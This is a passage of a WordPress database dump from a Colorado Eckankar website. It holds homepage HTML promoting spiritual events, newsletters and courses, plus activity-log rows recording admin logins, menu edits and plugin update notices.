0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(243138,41210,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=ccef69b381&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F22%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F22%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(243137,41210,'_server_remote_addr','184.96.219.x'),(243132,41210,'post_title','ECK LIGHT &#038; SOUND TEMPLATE-In Person &#038; Online-CONTAINS REGISTRATION | Benefit Title goes here'),(243131,41210,'post_type','mec-events'),(243124,41209,'_message_key','post_updated'),(243125,41209,'_user_id','2'),(243126,41209,'_user_login','S8zhaBda'),(243127,41209,'_user_email','nada@zipnadanot.org'),(243128,41209,'_server_remote_addr','76.130.120.x'),(243129,41209,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(243130,41210,'post_id','269412'),(243056,41201,'_server_remote_addr','76.130.120.x'),(243057,41201,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(243058,41202,'setting_id','nav_menu_item[267112]'),(243059,41202,'setting_old_value','{\n    \"menu_item_parent\": 0,\n    \"object_id\": 267112,\n    \"object\": \"custom\",\n    \"type\": \"custom\",\n    \"type_label\": \"Custom Link\",\n    \"title\": \"<i class=\\\"fa-lg fa fa-podcast\\\" ><\\/i>\",\n    \"url\": \"https:\\/\\/www.eckankar.org\\/podcasts\\/\",\n    \"target\": \"_blank\",\n    \"attr_title\": \"\",\n    \"description\": \"\",\n    \"classes\": \"\",\n    \"xfn\": \"\",\n    \"nav_menu_term_id\": 8,\n    \"position\": 3,\n    \"status\": \"publish\",\n    \"original_title\": \"\",\n    \"_invalid\": false\n}'),(243060,41202,'setting_new_value','false'),(243061,41202,'control_id','nav_menu_item[267112]'),(243062,41202,'control_label','<i class=\"fa-lg fa fa-podcast\" ></i>'),(243063,41202,'control_type','nav_menu_item'),(243064,41202,'_message_key','appearance_customized'),(243065,41202,'_user_id','2'),(243066,41202,'_user_login','S8zhaBda'),(243067,41202,'_user_email','nada@zipnadanot.org'),(243068,41202,'_server_remote_addr','76.130.120.x'),(243069,41202,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(243070,41203,'setting_id','nav_menu_item[267121]'),(243071,41203,'setting_old_value','{\n    \"menu_item_parent\": 0,\n    \"object_id\": 267121,\n    \"object\": \"custom\",\n    \"type\": \"custom\",\n    \"type_label\": \"Custom Link\",\n    \"title\": \"<i class=\\\"fa-lg fa fa-instagram\\\" aria-hidden=\\\"true\\\" ><\\/i>\",\n    \"url\": \"https:\\/\\/www.instagram.com\\/EckankarOfficial\\/\",\n    \"target\": \"_blank\",\n    \"attr_title\": \"\",\n    \"description\": \"\",\n    \"classes\": \"\",\n    \"xfn\": \"\",\n    \"nav_menu_term_id\": 8,\n    \"position\": 4,\n    \"status\": \"publish\",\n    \"original_title\": \"\",\n    \"_invalid\": false\n}'),(243072,41203,'setting_new_value','false'),(243073,41203,'control_id','nav_menu_item[267121]'),(243074,41203,'control_label','<i class=\"fa-lg fa fa-instagram\" aria-hidden=\"true\" ></i>'),(243075,41203,'control_type','nav_menu_item'),(243076,41203,'_message_key','appearance_customized'),(243077,41203,'_user_id','2'),(243078,41203,'_user_login','S8zhaBda'),(243079,41203,'_user_email','nada@zipnadanot.org'),(243080,41203,'_server_remote_addr','76.130.120.x'),(243081,41203,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(243082,41204,'_user_id','2'),(243083,41204,'_user_login','S8zhaBda'),(243084,41204,'_user_email','nada@zipnadanot.org'),(243085,41204,'_message_key','user_logged_out'),(243086,41204,'_server_remote_addr','76.130.120.x'),(243087,41204,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec_calendars'),(243088,41205,'post_id','269410'),(243089,41205,'post_type','nf_sub'),(243090,41205,'post_title',''),(243091,41205,'_message_key','post_updated'),(243092,41205,'_server_remote_addr','73.153.140.x'),(243093,41205,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(243094,41206,'plugin_name','Modula'),(243095,41206,'plugin_current_version','2.7.8'),(243096,41206,'plugin_new_version','2.7.9'),(243097,41206,'_message_key','plugin_update_available'),(243098,41206,'_server_remote_addr','173.231.231.x'),(243099,41207,'user_id','2'),(243100,41207,'user_email','nada@zipnadanot.org'),(243101,41207,'user_login','S8zhaBda'),(243102,41207,'_user_id','2'),(243103,41207,'_user_login','S8zhaBda'),(243104,41207,'_user_email','nada@zipnadanot.org'),(243105,41207,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(243106,41207,'_message_key','user_logged_in'),(243107,41207,'_server_remote_addr','76.130.120.x'),(243108,41207,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(243109,41208,'user_id','15'),(243110,41208,'user_email','nadazipought@zilch.org'),(243111,41208,'user_login','john-admin-96'),(243112,41208,'_user_id','15'),(243113,41208,'_user_login','john-admin-96'),(243114,41208,'_user_email','nadazipought@zilch.org'),(243115,41208,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(243116,41208,'_message_key','user_logged_in'),(243117,41208,'_server_remote_addr','184.96.219.x'),(243118,41208,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(243119,41209,'post_id','7160'),(243120,41209,'post_type','page'),(243121,41209,'post_title','Home'),(243122,41209,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents 